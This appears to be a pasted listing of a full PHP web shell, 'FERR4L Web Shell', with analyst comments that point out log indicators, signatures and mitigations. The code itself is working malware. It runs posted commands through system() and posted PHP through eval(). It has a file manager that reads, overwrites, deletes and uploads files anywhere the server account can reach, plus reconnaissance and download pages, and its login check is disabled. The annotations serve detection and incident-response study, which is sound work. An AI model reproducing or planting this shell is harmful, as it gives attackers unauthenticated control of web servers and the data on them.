FeRR4L

shell dasar

Jan 3rd, 2014
  1. <?php
  2.  
  3. /*****[AUTH CONFIG]*****/ // Analyst note: this listing is a PHP web shell; the values below are its operator settings.
  4. $xpass = 'dc76e9f0c0006e8f919e0c515c66dbba3982f785'; //password for access in sha1 ("root" as default). NOTE(review): $xpass is never read again in the visible code, so this hash gates nothing.
  5.  
  6. /*****[COLOR CONFIG]*****/
  7. $text = '#FF0000'; //text color
  8. $background = '#1A1A1A'; //background color
  9.  
  10. /*****[PHP CONFIG]*****/ // Lifts the execution time limit and keeps the script running after the client disconnects; @ suppresses any warnings these calls raise.
  11. @set_time_limit(0);
  12. @ini_set('max_execution_time',0);
  13. @ignore_user_abort(1);
  14.  
  15. /*****[CODE START]*****/ // Request-derived values reused by every branch below.
  16. $self = $_SERVER['PHP_SELF']; // script path; concatenated unescaped into form actions and links further down
  17. $act = $_GET['action']; // selects the feature branch; read without an isset() check
  18. $user = $_ENV['USERNAME']; // printed on the serverinfo page
  19.  
  20. /*****[AUTH CODE]*****/ // Login plumbing only: a posted password is copied into a cookie, but no comparison against $xpass appears anywhere in the visible code.
  21. $pass = $_POST['xpass']; // submitted password field, if any
  22. $login = "
  23.    <title>FERR4L Web Shell</title>
  24.    <center>Enter Password:<br>
  25.    <form method='POST' action=".$self.">
  26.   <input type='password' name='xpass'><br><input type='submit'></form>"; // login form markup; printed only by the if (1 != 1) branch below
  27. if(isset($pass)) // true for any POST that carries an xpass field
  28. {
  29.     setcookie("FERR4L", $pass, time()+86400); // stores the submitted value verbatim in a cookie named FERR4L for 86400 seconds; a Cookie or Set-Cookie header with this name is a usable log indicator
  30.     print ("<META http-equiv='refresh' content='0'>"); // immediate page reload
  31. }
  32. if (1 != 1) // NOTE(review): constant false, so the login form is never printed and the else branch always runs; for incident response, assume any requester could reach the features below, not only whoever planted the file
  33. {
  34.     print ($login);
  35. }
  36. else
  37. {
  38. if (isset($_POST['FERR4L_DIR'])) // directory change request posted by the file manager forms
  39.    {
  40.        $x = $_POST['FERR4L_DIR'];
  41.        setcookie("FERR4L_DIR", $x, time()+86400); // client-supplied path persisted in a second cookie and later used as the working directory
  42.       print ("<META http-equiv='refresh' content='0'>");
  43.    }
  44. elseif ($act !== "load") // every action except load renders the HTML interface; load is handled by the download branch at the end of the file
  45. {
  46.  
  47. /*****[MAIN]*****/ // Banner printed on every interface page: discloses php_uname(), SERVER_SOFTWARE, HTTP_HOST and SERVER_ADDR, then links to each action. The literal title FERR4L Web Shell in a response body is a simple content signature for this sample.
  48. if (ini_get("safe_mode") or strtolower(ini_get("safe_mode")) == "on"){$smode = "ON";}else{$smode = "OFF";} // reports whether the legacy safe_mode ini setting is on
  49. print ("
  50. <title>FERR4L Web Shell</title>
  51. <META http-equiv='expires' content='0'>
  52. <head><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head>
  53. <body text='".$text."' bgcolor='".$background."' link='".$text."' vlink='".$text."' alink='".$text."'>
  54. <center><b><font size='5'>FERR4L WEB SHELL</b>
  55. </font></b></div>
  56. <div align='center'>
  57. <table border='1' width='70%' bordercolorlight='".$text."' cellspacing='0' id='table1'>
  58. <tr><td colspan='2'><font style='font-size: 11.5pt'>
  59. &nbsp;System: ".php_uname()."<br>
  60. &nbsp;Server: ".$_SERVER['SERVER_SOFTWARE']."<br>
  61. &nbsp;Safe mode: ".$smode."<br>
  62. &nbsp;Host info: ".$_SERVER['HTTP_HOST'].' - '.$_SERVER['SERVER_ADDR']."
  63. </font></tr><tr><td>
  64. &nbsp;&nbsp;<a href='".$self."'>Shell</a>
  65. &nbsp;&nbsp;<a href='".$self."?action=serverinfo'>ServInfo</a>
  66. &nbsp;&nbsp;<a href='".$self."?action=files'>Files</a>
  67. &nbsp;&nbsp;<a href='".$self."?action=eval'>PHP</a>
  68. &nbsp;&nbsp;<a href='".$self."?action=xpack'>X-toolz</a>
  69. </td></tr><tr><td>"); // navigation row ends here; the selected action renders into the cell opened last
  70.  
  71. /*****[SERVER INFO]*****/ // Reconnaissance page: prints the environment user name, which database and compression functions exist, the disable_functions setting, and the loaded PHP and Apache modules. Appears in access logs as action=serverinfo in the query string.
  72. if ($act == "serverinfo")
  73. {
  74.     if(function_exists('curl_version')>0){$curl = "ON";}else{$curl = "OFF";} // presence check only; the lines that follow use the same function_exists() pattern
  75.     (($disabled=ini_get('disable_functions'))==')?$disabled='NO':str_replace(array(',',';'), ', ', $disabled);
  76.    if(get_magic_quotes_gpc()>0){$mq="ON";}else{$mq="OFF";}
  77.    if(function_exists('apache_get_modules')>0){$apache=implode(', ',apache_get_modules());}
  78.    if(function_exists('get_loaded_extensions')>0){$phprun=implode(', ',get_loaded_extensions());}
  79.    if(function_exists('gzencode')>0){$gzip="ON";}else{$gzip="OFF";}
  80.    if(function_exists('mysql_connect')>0){$mysql="ON";}else{$mysql="OFF";}
  81.    if(function_exists('mssql_connect')>0){$mssql="ON";}else{$mssql="OFF";}
  82.    if(function_exists('pg_connect')>0){$PostgreSQL="ON";}else{$PostgreSQL="OFF";}
  83.    if(function_exists('ocilogon')>0){$Oracle="ON";}else{$Oracle="OFF";}
  84.    print("
  85.    <table><td>
  86.   <b>User:</b> " . $user ."<br>
  87.   <b>cURL:</b> " . $curl. "<br>
  88.   <b>gZip:</b> " . $gzip. "<br>
  89.   <b>MySQL:</b> " . $mysql. "<br>
  90.   <b>MsSQL:</b> " . $mssql. "<br>
  91.   <b>PostgreSQL:</b> " . $PostgreSQL. "<br>
  92.   <b>Oracle:</b> " . $Oracle. "<br>
  93.   <b>Magic Quotes:</b> ". $mq ."<br>
  94.   <b>Disabled PHP functions:</b> " . $disabled ."<br>
  95.   <b>PHP Modules:</b> " . $phprun ."<br>
  96.   <b>Apache Modules:</b> " . $apache ."<br>");
  97. }
  98.  
  99. /*****[PHP Eval]*****/ // Executes operator-supplied PHP source. eval is a language construct, so the disable_functions ini setting does not block this branch.
  100. elseif($act == "eval")
  101. {
  102.    $eval=$_POST['eval']; // code arrives in the POST body, which common access-log formats do not record; only action=eval in the URL is visible there
  103.    print("
  104.    <table><form action='".$self."?action=eval' method='POST'><tr><td>
  105.    <textarea name='eval' style='color: ".$text."; background-color: ".$background."' cols='82' rows='10'></textarea>
  106.    <input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'></td></tr>
  107.   <td style='border-style: solid; border-width: 1px'>");
  108.    if(isset($eval))
  109.    {
  110.        $eval=str_replace('\"', "'", $eval); // swaps backslash-escaped double quotes for single quotes before execution
  111.        eval($eval); // posted string runs as PHP inside the web server's PHP process; no validation precedes it
  112.    }
  113. }
  114.  
  115. /*****[ENCODER]*****/ // Utility page: prints the posted value and its base64, hex, MD5 and SHA1 forms. Only the hex-decoded field passes through htmlspecialchars; the raw value and the base64-decoded value are written to the page unescaped.
  116. elseif($act == "encoder")
  117. {
  118.    $code=$_POST['code']; // value to transform, taken from the POST body
  119.    print("
  120.    <table>
  121.    <form method='POST'>
  122.    <tr><td><input size='80' style='color: ".$text."; background-color: ".$background."' name='code'>
  123.    <input type='submit' value='enc0de' style='color: ".$text."; background-color: ".$background."'>
  124.    </td></tr>");
  125.    if(isset($code)) // results are rendered only after a submission; the MD5 row below is a link to an external lookup site with the posted value in its query string
  126.    {
  127.        print ("
  128.        <tr><td>
  129.        Text: ". $code ."<br>
  130.        Base 64 encoded: &nbsp;&nbsp;&nbsp;".base64_encode($code)."<br>
  131.        Base 64 decoded: &nbsp;&nbsp;&nbsp;".base64_decode($code)."<br>
  132.        Hex encoded text: &nbsp;&nbsp;&nbsp;".bin2hex($code)."<br>
  133.        Hex decoded text: &nbsp;&nbsp;&nbsp;".@htmlspecialchars(pack("H*",$code))."<br>
  134.        MD5 encoded text: &nbsp;".md5($code)."<br>
  135.        MD5 decoded text: &nbsp;<a href='http://gdataonline.com/qkhash.php?mode=txt&hash=".$code."'>view</a><br>
  136.         SHA1 encoded text: ".sha1($code)."<br></td>");
  137.    }
  138. }
  139.  
  140. /*****[X-PACK]*****/ // Menu page; in this listing it links only to the encoder action.
  141. elseif($act == "xpack")
  142. {
  143.    print("<center>
  144.     &nbsp;&nbsp;<a href='".$self."?action=encoder'>Encoder</a><br>
  145.    ");
  146. }
  147.  
  148. /*****[FILES]*****/ // File manager. Paths come straight from cookies, query strings and POST fields with no restriction to the web root, so its reach is whatever the PHP process account and settings such as open_basedir allow.
  149. elseif($act == "files")
  150. {
  151.    if (isset($_COOKIE['FERR4L_DIR'])) // working directory is client-controlled when the cookie is present
  152.   {
  153.       $x = $_COOKIE['FERR4L_DIR'];
  154.   }
  155.   else
  156.   {
  157.        $x = dirname($_SERVER['SCRIPT_FILENAME']); // otherwise start in the directory holding this script
  158.    }
  159.    $xdir=@chdir($x); // failure is silenced by @ and the result is not checked in the visible code
  160.    if($_GET["view"] !== NULL) // view/edit branch; the path is in the query string, so access logs normally show which files were opened
  161.    {
  162.       $view=$_GET["view"];
  163.        ob_clean();
  164.        $z = file_get_contents($view); // reads the requested path as given
  165.        print("
  166.         <table>
  167.         <tr><td>
  168.         <a href='javascript:history.back();'>Go back</a>
  169.        <form method='POST'>
  170.         <textarea name='content' style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  171.        print (str_replace('</textarea>', '<//textarea>', $z)); // rewrites any closing textarea tag in the file body so it does not end the editor box
  172.        print ("</textarea><br><input type='submit' value='Save' style='color: ".$text."; background-color: ".$background."'></form>");
  173.       if(isset($_POST['content'])) // save request for the file being viewed
  174.       {
  175.           $content = $_POST['content'];
  176.          $content = str_replace("<//textarea>", "</textarea>", $content); // reverses the substitution applied when the file was displayed
  177.           $content = str_replace('\"', '"', $content);
  178.           $content = str_replace("\'", "'", $content);
  179.           $f = fopen($view, 'w'); // truncates and overwrites the viewed path; file integrity monitoring on web content would record this write
  180.           fputs ($f, $content);
  181.           fclose ($f);
  182.           print ("<META http-equiv='refresh' content='0'>");
  183.        }
  184.     }
  185.     elseif($_GET["up"] !== NULL) // upload form only; this and the following branches echo request values into the page unescaped
  186.     {
  187.         print("<center><b>Upload!<br></b><form enctype='multipart/form-data' action='".$self."?action=files' method='POST'>
  188.       <input type='file' style='color: ".$text."; background-color: ".$background."' size='40' name='upl' style='color: ".$text."; background-color: ".$background."'><br>
  189.       TO: <input type='text' name='dir' size='40' style='color: ".$text."; background-color: ".$background."' value=".$x.">
  190.       <input type='submit' style='color: ".$text."; background-color: ".$background."' value='GO!'></form>");
  191.     }
  192.     elseif($_GET["md"] !== NULL) // make-directory form only
  193.     {
  194.         print("<form method='POST' action='".$self."?action=files'>
  195.       <center><b>Make dir!</b><br><input type='text' style='color: ".$text."; background-color: ".$background."' name='makedir'>
  196.       <input type='submit' value='make' style='color: ".$text."; background-color: ".$background."'></form>");
  197.     }
  198.     elseif($_GET["deletef"] !== NULL) // file deletion; the target path is in the query string
  199.     {
  200.         if(@unlink($_GET["deletef"]))
  201.        {
  202.            print ("<center>File \"".$_GET['deletef']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  203.        }
  204.        else
  205.        {
  206.       print ("<center>File \"".$_GET['deletef']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  207.        }
  208.     }
  209.     elseif($_GET["deleted"] !== NULL) // directory removal via rmdir(); the target path is in the query string
  210.     {
  211.         if(@rmdir($_GET["deleted"]))
  212.        {
  213.            print ("<center>Dir \"".$_GET['deleted']."\" successful deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  214.        }
  215.        else
  216.        {
  217.            print ("<center>Dir \"".$_GET['deleted']."\" can`t be deleted!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  218.        }
  219.     }
  220.     elseif($_GET["rename"] !== NULL) // rename: source path from the query string, destination from the POST body
  221.     {
  222.        if(isset($_POST['rename']))
  223.       {
  224.           @rename($_GET['rename'], $_POST['rename']) or die ("<center>".$_GET['rename']."\" can`t be renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  225.          print ("<center>".$_GET['rename']."\" successful renamed to".$_POST['rename']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  226.       }
  227.       else
  228.       {
  229.             print ("<center>Rename ".$_GET['rename']."<br><form method='POST'>to:
  230.          <input size='45' value='".dirname($_GET['rename'])."/' name='rename' style='color: ".$text."; background-color: ".$background."'>
  231.          <input type='submit' value='Rename' style='color: ".$text."; background-color: ".$background."'>");
  232.       }
  233.    }
  234.     elseif($_GET["chmod"] !== NULL) // permission change: target path from the query string, mode from the POST body
  235.     {
  236.        if(isset($_POST['chmod']))
  237.       {
  238.           @chmod($_GET['chmod'], $_POST['chmod']) or die ("<center>Chmod for ".$_GET['chmod']." can`t be changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  239.          print ("<center>Chmod for ".$_GET['chmod']." successful changed to ".$_POST['chmod']."!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  240.       }
  241.       else
  242.       {
  243.             print ("<center>Chmod ".$_GET['cmod']."<br><form method='POST'>
  244.          <input size='45' value='0777' name='chmod' style='color: ".$text."; background-color: ".$background."'>
  245.          <input type='submit' value='Chmod' style='color: ".$text."; background-color: ".$background."'>");
  246.       }
  247.    }
  248.     elseif($_POST["makedir"] !== NULL) // directory creation from the POST body; nothing about the new path appears in the URL
  249.     {
  250.         if(@mkdir($_POST["makedir"]))
  251.        {
  252.            print ("<center>Dir \"".$_POST["makedir"]."\" successful created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  253.        }
  254.        else
  255.        {
  256.           print ("<center>Dir \"".$_POST["makedir"]."\" can`t be created!<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  257.        }
  258.     }
  259.     elseif (isset($HTTP_POST_FILES["upl"])) // upload handler; reads the legacy $HTTP_POST_FILES array, which dates the sample to old PHP releases
  260.     {
  261.         if(@copy($HTTP_POST_FILES["upl"]["tmp_name"],
  262.        $_POST['dir']."/".$HTTP_POST_FILES["upl"]["name"]))
  263.         {
  264.             print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" successful uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  265.         }
  266.        else
  267.        {
  268.            print("<center>File \"".$HTTP_POST_FILES["upl"]["name"]."\" can`t be uploaded<META http-equiv='refresh' content='3; URL=".$self."?action=files'>");
  269.        }
  270.     }
  271.     else // no file operation requested: render the directory listing for $x
  272.     {
  273.        function chmodr($name) // prints the owner, group and other read/write/execute bits of $name as r, w, x or -, with a slash between the three groups; calls fileperms() once per bit
  274.         {
  275.             if (fileperms($name) & 00400){print "r";}else{print "-";}
  276.            if (fileperms($name) & 00200){print "w";}else{print "-";}
  277.             if (fileperms($name) & 00100){print "x";}else{print "-";}
  278.            print ("/");
  279.            if (fileperms($name) & 00040){print "r";}else{print "-";}
  280.            if (fileperms($name) & 00020){print "w";}else{print "-";}
  281.            if (fileperms($name) & 00010){print "x";}else{print "-";}
  282.            print ("/");
  283.            if (fileperms($name) & 00004){print "r";}else{print "-";}
  284.            if (fileperms($name) & 00002){print "w";}else{print "-";}
  285.            if (fileperms($name) & 00001){print "x";}else{print "-";}
  286.         }
  287.       if (PHP_OS != "WINNT"){$nowin = 1;} // owner and group names are resolved through posix_* calls only when this flag is set
  288.       if (!($dir = @opendir($x))) // unreadable directory: print an error with a form that resets FERR4L_DIR to the script directory, then stop
  289.       {
  290.            die ("<center>Access denied on <b>".$x."<b><br><table><td><form method='POST'>
  291.            <input type='hidden' name='FERR4L_DIR' value=".dirname($_SERVER['SCRIPT_FILENAME']).">
  292.            <input type='submit' value='Go home' style='color: ".$text."; background-color: ".$background."'>
  293.           </form>");
  294.        }
  295.        print ("<table width='695'><td colspan='6'><table><td><form method='POST'>
  296.        <input size='63' style='color: ".$text."; background-color: ".$background."' name='FERR4L_DIR' value=".$x.">
  297.        <input type='submit' value='Go!' style='color: ".$text."; background-color: ".$background."'>
  298.       </form>
  299.      </table></center>&nbsp;<tr>
  300.      <td width='40'>Type/Name<td width='16'>Size(Byte)<td width='80'>Perms<td width='20'>Owner<td width='20'>Group<td width='20'>&nbsp;<tr>");
  301.         print ("<td width='40'>dir&nbsp;&nbsp;<b>.</b><td width='25'>---<td width='80'>");
  302.       chmodr($x."/.");
  303.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/.")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/.")); print($k[name]);}else{print("---");} print("<td width='200'>");
  304.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/.'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/.'>Chmod</a><tr>");
  305.         print ("<td width='40'>dir&nbsp;&nbsp;<b>..</b><td width='25'>---<td width='80'>");
  306.       chmodr($x."/..");
  307.       print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($x."/..")); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($x."/..")); print($k[name]);}else{print("---");} print("<td width='200'>");
  308.        print ("<a href='".$self."?action=files&deleted=".$x."/.'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/..'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/..'>Chmod</a><tr>");
  309.         while($name = readdir($dir)) // first pass over the directory: rows for subdirectories only
  310.         {
  311.           if (is_dir($name))
  312.           {
  313.              if ($name !== "." and $name !== "..")
  314.             {
  315.                    print ("<td width='40'>dir&nbsp;&nbsp;<b>".$name."</b><td width='25'>---<td width='80'>");
  316.                     chmodr($name);
  317.                  print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  318.                   print ("<a href='".$self."?action=files&deleted=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  319.             }
  320.          }
  321.       }
  322.       $dir = @opendir($x); // directory is reopened for a second pass; the first handle is not closed in the visible code
  323.       while($name = readdir($dir)) // second pass: rows for non-directories, each with Load, Edit, Delete, Rename and Chmod links carrying the full path in the query string
  324.         {
  325.          if (!is_dir($name))
  326.          {
  327.                 print ("<td width='40'>".filetype($name)."&nbsp;&nbsp;".$name."<td width='25'>".filesize($name)."<td width='80'>");
  328.                 chmodr($name);
  329.              print ("<td width='20'>"); if(isset($nowin)){$k=posix_getpwuid(fileowner($name)); print($k[name]);}else{print("---");} print("<td width='20'>"); if(isset($nowin)){$k=posix_getgrgid(filegroup($name)); print($k[name]);}else{print("---");} print("<td width='200'>");
  330.               print ("<a href='".$self."?action=load&load=".$x."/".$name."'>Load</a>&nbsp;|&nbsp;<a href='".$self."?action=files&view=".$x."/".$name."'>Edit</a>&nbsp;|&nbsp;<a href='".$self."?action=files&deletef=".$x."/".$name."'>Delete</a>&nbsp;|&nbsp;<a href='".$self."?action=files&rename=".$x."/".$name."'>Rename</a>&nbsp;|&nbsp;<a href='".$self."?action=files&chmod=".$x."/".$name."'>Chmod</a><tr>");
  331.          }
  332.        }
  333.        print ("
  334.       </td><tr></td></td><tr></td><tr><td colspan='6' rowspan='2'><center><b><a href='".$self."?action=files&md'>Make Directory</a><br><a href='".$self."?action=files&up'>Uploader</a></b></td>
  335.       ");
  336.     }
  337. }
  338. /*****[SHELL]*****/ // Default page when no other action matches: passes the posted cmd field to system(). Listing system in the disable_functions ini setting stops this branch; process monitoring would typically show the web server account starting child processes.
  339. else
  340. {
  341.     print("
  342.    <table>
  343.    <form action='".$self."' method='POST'>
  344.    <tr><td>
  345.    <input size='80' style='color: ".$text."; background-color: ".$background."' name='cmd'><input type='submit' value='eXecute' style='color: ".$text."; background-color: ".$background."'>
  346.    </td></tr><tr><td>
  347.    <textarea style='color: ".$text."; background-color: ".$background."' cols='82' rows='20'>");
  348.     if (isset($_POST['cmd'])) // the command travels in the POST body, so URL-only access logs show just a POST to this script with no action parameter
  349.     {
  350.     system($_POST['cmd']); // posted string is handed to the operating system unfiltered; its output is written into the textarea
  351.     }
  352.     print ("</textarea>");
  353. }
  354. }
  355.  
  356. /*****[FILE DOWNLOAD]*****/ // Reached when action=load: sends the file named in the load query parameter back as an attachment. Because the path travels in the URL, access logs normally record which files were requested this way.
  357. else
  358. {
  359.     $load=$_GET["load"]; // path is used as given, with no restriction to a base directory
  360.     ob_clean();
  361.     header("Content-type: application/octet-stream/".filetype($load)); // appends the filetype() result to the MIME type string
  362.     header("Content-length: ".filesize($load));
  363.     header("Content-disposition: attachment; filename=".$load); // request value placed in a response header unmodified
  364.     $z = file_get_contents($load); // whole file is read into memory before being printed
  365.     print $z;
  366.     exit;
  367. }
  368. }
  369.  
  370. ?>